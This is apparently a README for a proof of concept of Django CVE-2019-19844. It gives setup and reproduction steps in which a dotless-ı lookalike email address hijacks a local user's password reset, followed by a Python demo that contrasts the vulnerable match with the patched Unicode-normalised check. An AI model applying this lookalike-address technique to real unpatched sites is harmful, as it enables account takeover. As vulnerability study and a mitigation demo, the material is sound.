django_cve_2019_19844_poc

PoC for CVE-2019-19844

Requirements

Setup

  1. Create a database (e.g. django_cve_2019_19844_poc)
  2. Set the environment variable DJANGO_DATABASE_NAME to the database name (e.g. export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc)
  3. Run pip install -r requirements.txt && ./manage.py migrate --noinput
  4. Create the following user from the Django shell:
>>> from django.contrib.auth import get_user_model
>>> User = get_user_model()
>>> User.objects.create_user('mike123', 'mike@example.org', 'test123')

Procedure For Reproducing

  1. Run ./manage.py runserver
  2. Open http://127.0.0.1:8000/accounts/password-reset/
  3. Enter mıke@example.org (the attacker's address, spelled with a dotless ı, U+0131, in place of the i) and click the send button
  4. Receive the password-reset email (check the console output) and reset the password
  5. Log in as the mike123 user
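As an added illustration of the mitigation (this is not code from the PoC repository): Django's fix re-checks every database match in Python with an NFKC-normalised, casefolded comparison, so the dotless-ı lookalike above no longer matches the stored address. The sample addresses and the helper names are constructed for this demo, and db_style_iexact only mimics a backend's UPPER()-based case-insensitive match.

```python
import unicodedata

# Constructed sample data: the victim's stored address and the attacker-controlled
# address that differs only by a dotless i (U+0131).
VICTIM_EMAIL = "mike@example.org"
LOOKALIKE_EMAIL = "m\u0131ke@example.org"


def db_style_iexact(s1: str, s2: str) -> bool:
    """Mimic a database-side case-insensitive match that upper-cases both sides.
    Like UPPER() on some backends, Python's upper() maps U+0131 to 'I', so the
    lookalike collides with the real address. (Demo helper, not Django code.)"""
    return s1.upper() == s2.upper()


def unicode_ci_compare(s1: str, s2: str) -> bool:
    """Case-insensitive identifier comparison: NFKC-normalise, then casefold
    (Unicode TR36 2.11.2(B)(2)). This is the check Django's fix applies in
    Python after the database lookup, reproduced here for illustration."""
    return (unicodedata.normalize("NFKC", s1).casefold()
            == unicodedata.normalize("NFKC", s2).casefold())


def reset_recipients(submitted: str, stored_emails, hardened: bool):
    """Return the stored addresses that would receive a reset email for
    `submitted`. hardened=False relies on the DB-style match alone (the
    vulnerable behaviour); hardened=True also requires the Python check to
    pass (the patched behaviour)."""
    matches = [e for e in stored_emails if db_style_iexact(submitted, e)]
    if hardened:
        matches = [e for e in matches if unicode_ci_compare(submitted, e)]
    return matches


if __name__ == "__main__":
    users = [VICTIM_EMAIL, "ann@example.org"]
    print("vulnerable:", reset_recipients(LOOKALIKE_EMAIL, users, hardened=False))
    print("patched:   ", reset_recipients(LOOKALIKE_EMAIL, users, hardened=True))
```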

Email